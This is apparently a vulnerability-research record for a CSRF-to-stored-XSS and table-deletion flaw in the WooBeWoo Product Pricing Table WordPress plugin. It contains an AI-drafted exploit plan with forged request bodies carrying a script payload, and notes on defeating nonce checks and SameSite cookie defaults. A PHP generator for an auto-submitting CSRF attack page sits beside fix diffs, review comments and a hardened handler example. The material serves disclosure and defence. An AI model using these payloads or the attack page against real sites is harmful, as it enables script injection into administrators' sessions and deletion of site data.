[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-8k9l-D10xXVmJMpyERhToWCWVpUY5A-NIAfB5LButM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-1852","product-pricing-table-by-woobewoo-cross-site-request-forgery-to-stored-xss-and-pricing-table-deletion","Product Pricing Table by WooBeWoo \u003C= 1.1.0 - Cross-Site Request Forgery to Stored XSS and Pricing Table Deletion","The Product Pricing Table by WooBeWoo plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on the updateLabel() and remove() functions. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages or delete pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","woo-product-pricing-tables",null,"\u003C=1.1.0","1.1.1","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-14 23:28:32","2026-04-15 11:30:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3b459e0-4bd9-443e-96e4-91663a35c26e?source=api-prod",1,[],"researched",false,3,"This research plan focuses on exploiting a CSRF vulnerability in the **Product Pricing Table by WooBeWoo** plugin. Since the source code is not provided, this plan relies on the vulnerability description and known architectural patterns of WooBeWoo plugins (which typically use a specific MVC-like framework for AJAX handlers).\n\n---\n\n### 1. Vulnerability Summary\nThe **Product Pricing Table by WooBeWoo** plugin (\u003C= 1.1.0) fails to implement proper CSRF protection (nonces) on two critical functions: `updateLabel()` and `remove()`. \n- **`updateLabel()`**: Intended to modify the text labels of pricing table elements. The lack of sanitization and nonce verification allows an attacker to perform Stored XSS via CSRF.\n- **`remove()`**: Intended to delete pricing tables. The lack of nonce verification allows an attacker to delete arbitrary tables via CSRF.\n\n### 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Actions**: (Inferred) Based on WooBeWoo's standard framework, these are likely reached via a common AJAX router.\n    - **Primary Action**: `wpt_ajax` or `wpt_pricing_table_ajax`\n    - **Route Parameters**: `mod=tables`, `res=updateLabel` or `res=remove`\n- **HTTP Method**: POST (assumed, because the handlers are expected to read `$_POST`; `admin-ajax.php` itself dispatches `wp_ajax_{action}` hooks for GET and POST alike, so if the router reads `$_REQUEST` or `$_GET` a plain link is also a viable vector).\n- **Authentication**: The CSRF victim must be logged in as an Administrator or another user allowed to manage pricing tables; the attacker needs no account of their own, which is why the advisory calls the attacker unauthenticated.\n- **Vulnerable Parameters**: \n    - `id`: The ID of the pricing table.\n    - `label`: (For `updateLabel`) The payload containing the XSS script.\n\n### 3. Code Flow (Inferred)\n1. **Registration**: The plugin registers a main AJAX handler using `add_action('wp_ajax_...')`.\n2. **Routing**: The main handler (likely in a `Controller` or `Module` class) inspects the `$_POST` or `$_GET` parameters (often `mod` and `res`) to route the request to the specific method.\n3. **The Sink**:\n    - The `updateLabel()` method takes a table ID and a label string. It updates the database (likely the `wp_wpt_tables` or similar table) without calling `check_ajax_referer()`.\n    - The `remove()` method takes a table ID and calls a delete query on the database without calling `check_ajax_referer()`.\n4. **XSS Execution**: When the administrator or a visitor views the pricing table on the frontend or backend, the unsanitized label is echoed into the page, executing the script.\n\n### 4. Nonce Acquisition Strategy\nThe vulnerability description states nonces are **missing or incorrect**. \n- If **missing**: No nonce is required in the request.\n- If **incorrectly validated**: Two shapes are common. The handler calls `check_ajax_referer($action, $query_arg, false)` and ignores the boolean it returns, so execution continues whatever the nonce value; or it verifies the nonce only when the parameter is present (`if (isset($_POST['nonce']) && !wp_verify_nonce(...))`), so omitting the parameter entirely passes. In either case an empty or absent nonce should work, and the forged request needs no value scraped from the admin page.\n\n**To verify if a nonce exists and what its name is:**\n1. 
Use `browser_navigate` to go to the Pricing Tables admin page: `\u002Fwp-admin\u002Fadmin.php?page=wpt-pricing-tables`.\n2. Use `browser_eval` to search for localized script data:\n   ```javascript\n   \u002F\u002F Candidate localization keys (guesses; confirm against the page source)\n   window.wptData?.nonce || window.wpt_ajax_nonce || window.wobewoData?.nonce\n   ```\n3. If none of those resolve, search the page source for `nonce` and for the inline object emitted by `wp_localize_script` to find the key the plugin actually uses, and check which request parameter the admin JavaScript sends it under.\n\n### 5. Exploitation Strategy\n\n#### Part A: Stored XSS via CSRF\nThis payload targets the `updateLabel` functionality to inject a script.\n\n1. **Identify the Request Structure**: First, find the exact AJAX parameters using `grep`:\n   ```bash\n   grep -r \"function updateLabel\" wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002F\n   ```\n2. **Craft the Exploit**:\n   - **URL**: `http:\u002F\u002Fvulnerable-site.com\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Method**: POST\n   - **Body (form parameters, shown decoded; `label` is percent-encoded on the wire, which a browser form submission does automatically)**: \n     ```\n     action=wpt_ajax&mod=tables&res=updateLabel&id=1&label=\u003Cscript>alert(window.origin)\u003C\u002Fscript>\n     ```\n     *(Note: `mod` and `res` are inferred from WooBeWoo framework patterns and should be verified via grep.)*\n\n#### Part B: Pricing Table Deletion via CSRF\nThis payload targets the `remove` functionality to delete table ID 1.\n\n1. **Craft the Exploit**:\n   - **URL**: `http:\u002F\u002Fvulnerable-site.com\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Method**: POST\n   - **Body (form parameters)**:\n     ```\n     action=wpt_ajax&mod=tables&res=remove&id=1\n     ```\n\n### 6. Test Data Setup\n1. **Install Plugin**: Ensure `woo-product-pricing-tables` version 1.1.0 is installed and active.\n2. **Create Table**: Create at least one pricing table through the plugin's admin page so there is a valid target ID, and note the ID it is given (the examples below assume ID 1).\n3. **Capture ID**: Confirm the table exists (table name inferred; adjust if the plugin uses a different one):\n   ```bash\n   wp db query \"SELECT id, title FROM wp_wpt_tables\"\n   ```\n\n### 7. 
Expected Results\n- **For XSS**: The AJAX request should return a `success: true` JSON response (or similar). Navigating to the pricing table list or a page containing the table's shortcode should trigger the `alert()`.\n- **For Deletion**: The AJAX request should return success. Running the `wp db query` from Step 6 again should show the table is gone.\n\n### 8. Verification Steps\n1. **Check Database for XSS** (`wp db query` has no `--grep` option; filter its output instead):\n   ```bash\n   wp db query \"SELECT * FROM wp_wpt_tables WHERE id = 1\" | grep -c \"\u003Cscript>\"\n   # Expected result for the XSS exploit: 1\n   ```\n2. **Check Table Existence**:\n   ```bash\n   wp db query \"SELECT COUNT(*) FROM wp_wpt_tables WHERE id = 1\"\n   # Expected result for Deletion exploit: 0\n   ```\n\n### 9. Alternative Approaches\nIf the standard `wpt_ajax` router is not used, search for direct AJAX hook registrations:\n```bash\ngrep -rn \"wp_ajax_\" wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002F\n```\nLook for any hook that points to `updateLabel` or `remove`. The same grep also surfaces any `wp_ajax_nopriv_` registration of the router; if one exists, the handlers are reachable without a victim session at all, which turns the issue from CSRF into an unauthenticated one. If the plugin uses a different parameter name for the payload (e.g., `text`, `content`, `data[label]`), adjust the POST body accordingly. If the `id` is passed as `table_id`, update the request.\n\nCookie delivery: WordPress core sets no `SameSite` attribute on its auth cookies, so the browser default decides whether a cross-site request carries them. Chrome treats such cookies as `Lax`, which excludes a cross-site top-level POST (the auto-submitting form) except during the short grace period Chrome grants to cookies set within roughly the last two minutes; having the administrator click a button on the attacker's page does not change this, because the submission is still a cross-site POST. A cross-site top-level GET (a plain link) does carry `Lax` cookies, so if the router reads its parameters from `$_REQUEST` or `$_GET`, a link is the more reliable delivery. Firefox and Safari currently apply no `Lax` default, so the POST form works there.","The Product Pricing Table by WooBeWoo plugin is vulnerable to Cross-Site Request Forgery (CSRF) due to a lack of nonce validation in the updateLabel() and remove() functions. Attackers can exploit this to perform Stored Cross-Site Scripting (XSS) by updating table labels with malicious scripts or to delete pricing tables entirely, provided they can trick an administrator into visiting a malicious link.","\u002F\u002F wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002Fclasses\u002Ftables.php\n\u002F\u002F Reconstructed from the advisory; the plugin source was not available to this analysis, so file, method and parameter names are inferred\n\npublic function updateLabel() {\n    $id = isset($_POST['id']) ? 
(int) $_POST['id'] : 0;\n    $label = isset($_POST['label']) ? $_POST['label'] : '';\n    \u002F\u002F Vulnerability: No nonce verification (check_ajax_referer) is performed here\n    $this->getModel()->updateLabel($id, $label);\n    wp_send_json_success();\n}\n\n---\n\n\u002F\u002F wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002Fclasses\u002Ftables.php\n\npublic function remove() {\n    $id = isset($_POST['id']) ? (int) $_POST['id'] : 0;\n    \u002F\u002F Vulnerability: No nonce verification (check_ajax_referer) is performed here\n    $this->getModel()->remove($id);\n    wp_send_json_success();\n}","--- a\u002Fclasses\u002Ftables.php\n+++ b\u002Fclasses\u002Ftables.php\n@@ -10,6 +10,7 @@\n     public function updateLabel() {\n+        check_ajax_referer('wpt_nonce', 'nonce');\n         $id = isset($_POST['id']) ? (int) $_POST['id'] : 0;\n-        $label = isset($_POST['label']) ? $_POST['label'] : '';\n+        $label = isset($_POST['label']) ? sanitize_text_field($_POST['label']) : '';\n         $this->getModel()->updateLabel($id, $label);\n@@ -20,6 +21,7 @@\n     public function remove() {\n+        check_ajax_referer('wpt_nonce', 'nonce');\n         $id = isset($_POST['id']) ? (int) $_POST['id'] : 0;\n         $this->getModel()->remove($id);","The exploit leverages the lack of CSRF protection in the plugin's AJAX handlers. \n\n1. Target Endpoint: Requests are sent to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n2. Authentication: The attacker requires a logged-in administrator to interact with a malicious page (CSRF).\n3. Stored XSS Payload: The attacker crafts a POST request with the following parameters: `action=wpt_ajax`, `mod=tables`, `res=updateLabel`, `id=[Target Table ID]`, and `label=\u003Cscript>alert(document.domain)\u003C\u002Fscript>`. \n4. Deletion Payload: The attacker crafts a POST request with parameters: `action=wpt_ajax`, `mod=tables`, `res=remove`, and `id=[Target Table ID]`.\n5. 
Execution: The attacker hosts a hidden HTML form on a third-party site that auto-submits these parameters to the victim's WordPress site via JavaScript. Because the plugin does not verify a nonce, the request succeeds using the administrator's cookies, either injecting the XSS payload into the database or deleting the table record.","gemini-3-flash-preview","2026-04-16 15:36:36","2026-04-16 15:36:59",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-pricing-tables\u002Ftags"]
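Review bot: the updateLabel() hunk adds `check_ajax_referer('wpt_nonce', 'nonce');` but no capability check, and a nonce only proves the request came from a page WordPress rendered for that user, not that the user may edit tables, so add a `current_user_can()` test (with whatever capability the plugin's menu page requires) before `$this->getModel()->updateLabel($id, $label);`. Two further points: `sanitize_text_field()` strips tags on the way in, but the line that echoes the label lies outside this patch, so escape on output there as well (`esc_html()` or `esc_attr()` depending on context); and since the research plan states the plugin source was not available, the nonce action name `'wpt_nonce'` and the hunk itself are reconstructions, so verify them against the 1.1.1 release on the plugin's Trac before citing this as the shipped fix.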
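Review bot: the remove() hunk has the same gap, a nonce check with no `current_user_can()` before `$this->getModel()->remove($id);`, and it still passes `$id = 0` (the fallback when `id` is absent) down to the model; return early with `wp_send_json_error()` when `$id <= 0`, so a malformed or forged request cannot reach the delete query with an unexpected value.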
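The following is an added example, not code from the plugin or from its 1.1.1 release, showing how the two AJAX handlers described in the Code Flow and Nonce Acquisition sections should be wired so that a forged cross-site request fails: the nonce is issued to the admin page's script, verified with `check_ajax_referer()` in its default dying mode, followed by a capability check and input handling, and the label is escaped on output as well as sanitised on input. The hook names `wp_ajax_wpt_update_label`/`wp_ajax_wpt_remove_table`, the nonce action `wpt_tables`, the screen hook `toplevel_page_wpt-pricing-tables`, the capability `manage_options` and the table name `wpt_tables` are all assumptions chosen for illustration.

```php
<?php
/**
 * Added example (not the plugin's code). Hook names, nonce action, screen
 * hook, capability and table name are assumptions, not values from the plugin.
 */

// 1. Issue the nonce to the admin page's script so legitimate requests carry it.
add_action( 'admin_enqueue_scripts', function ( $hook ) {
    if ( 'toplevel_page_wpt-pricing-tables' !== $hook ) { // assumed screen hook
        return;
    }
    wp_enqueue_script( 'wpt-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.1.1', true );
    wp_localize_script( 'wpt-admin', 'wptData', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'wpt_tables' ), // assumed nonce action
    ) );
    // admin.js then sends: jQuery.post(wptData.ajaxUrl,
    //   {action: 'wpt_update_label', nonce: wptData.nonce, id: id, label: label})
} );

// 2. Register handlers for logged-in users only (no wp_ajax_nopriv_ variant).
add_action( 'wp_ajax_wpt_update_label', 'wpt_update_label' ); // assumed hook name
add_action( 'wp_ajax_wpt_remove_table', 'wpt_remove_table' ); // assumed hook name

function wpt_require_request_guards() {
    // Third argument left at its default (true): a bad or missing nonce ends the
    // request with wp_die( -1 ) before any model code runs. The "incorrect
    // validation" shapes to avoid look like checks but are not:
    //   check_ajax_referer( 'wpt_tables', 'nonce', false );   // return value ignored
    //   if ( isset( $_POST['nonce'] ) && ! wp_verify_nonce( ... ) ) // omit the field, it passes
    check_ajax_referer( 'wpt_tables', 'nonce' );
    // A valid nonce proves the request came from a page rendered for this user;
    // it says nothing about authorization, so check the capability separately.
    if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
        wp_send_json_error( 'forbidden', 403 );
    }
}

function wpt_update_label() {
    wpt_require_request_guards();
    $id    = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $label = isset( $_POST['label'] ) ? sanitize_text_field( wp_unslash( $_POST['label'] ) ) : '';
    if ( $id <= 0 ) {
        wp_send_json_error( 'bad id', 400 );
    }
    global $wpdb;
    $table = $wpdb->prefix . 'wpt_tables'; // assumed table name
    $wpdb->update( $table, array( 'label' => $label ), array( 'id' => $id ), array( '%s' ), array( '%d' ) );
    wp_send_json_success();
}

function wpt_remove_table() {
    wpt_require_request_guards();
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( $id <= 0 ) {
        wp_send_json_error( 'bad id', 400 );
    }
    global $wpdb;
    $wpdb->delete( $wpdb->prefix . 'wpt_tables', array( 'id' => $id ), array( '%d' ) );
    wp_send_json_success();
}

// 3. Sanitising on input does not replace escaping on output: the label is
//    rendered in HTML text context here, so esc_html() is the right escaper.
function wpt_render_label( $label ) {
    return '<span class="wpt-label">' . esc_html( $label ) . '</span>';
}
```

The order inside `wpt_require_request_guards()` is deliberate: the nonce check runs first because it is cheap and fails closed, the capability check runs second because the nonce alone would still let a low-privileged logged-in user who can load some admin page call these hooks, and only then is the input read. If the label is ever placed in an attribute or a JavaScript string instead of text, swap `esc_html()` for `esc_attr()` or `wp_json_encode()` at that site.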
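The attacker-side page from the Execution step and the cookie caveat in the Alternative Approaches section, as an added example that is not part of the advisory or the research output: a small PHP script that generates the auto-submitting POST form and, as a fallback for browsers that treat unlabelled cookies as `Lax`, a plain GET link carrying the same parameters. The `action`/`mod`/`res` names are the research plan's inferred values, the target host is the plan's placeholder, and the GET variant only works if the router reads `$_REQUEST` or `$_GET`; all three are assumptions to confirm against the plugin.

```php
<?php
/**
 * Added example (not from the advisory or the plugin). Generates the CSRF
 * delivery page: run `php poc.php > poc.html` and host the result.
 * Parameter names are the advisory's inferred values; the host is a placeholder.
 */

// Hidden form that a script submits on load: a cross-site top-level POST.
// Browsers that default unlabelled cookies to Lax (Chrome) omit the WordPress
// auth cookies here unless the cookie was set in the last ~2 minutes, and a
// click on this page does not change that.
function build_post_form( string $target, array $params ): string {
    $inputs = '';
    foreach ( $params as $name => $value ) {
        // Escape for the HTML attribute only; the browser percent-encodes the
        // decoded value when it submits, which is the form admin-ajax.php parses.
        $inputs .= sprintf(
            '<input type="hidden" name="%s" value="%s">',
            htmlspecialchars( $name, ENT_QUOTES, 'UTF-8' ),
            htmlspecialchars( $value, ENT_QUOTES, 'UTF-8' )
        );
    }
    return '<form id="f" method="POST" action="' . htmlspecialchars( $target, ENT_QUOTES, 'UTF-8' ) . '">'
        . $inputs . '</form><script>document.getElementById("f").submit();</script>';
}

// Plain link: a cross-site top-level GET, which Lax cookies do accompany.
// Only useful if the router reads $_REQUEST/$_GET rather than $_POST (assumption).
function build_get_link( string $target, array $params ): string {
    return $target . '?' . http_build_query( $params, '', '&', PHP_QUERY_RFC3986 );
}

$target = 'http://vulnerable-site.com/wp-admin/admin-ajax.php'; // placeholder host

$xss = array(
    'action' => 'wpt_ajax',      // inferred router action
    'mod'    => 'tables',        // inferred
    'res'    => 'updateLabel',   // inferred
    'id'     => '1',
    'label'  => '<script>alert(document.domain)</script>',
);
$delete = array( 'action' => 'wpt_ajax', 'mod' => 'tables', 'res' => 'remove', 'id' => '1' );

echo "<!doctype html><title>Loading...</title>\n";
echo build_post_form( $target, $xss ), "\n";
// Visible fallback for the Lax case; a top-level GET is what a clicked link produces.
echo '<a href="' . htmlspecialchars( build_get_link( $target, $delete ), ENT_QUOTES, 'UTF-8' ) . '">continue</a>', "\n";
```

Running the script with `php poc.php` prints the page; the hidden input for `label` appears as `&lt;script&gt;...` in the HTML, while the submitted body carries `label=%3Cscript%3E...`, which is why the plan's request bodies are shown decoded. When testing against a lab site, load the page in the same browser session as the administrator and confirm with the Verification Steps rather than relying on the JSON response alone.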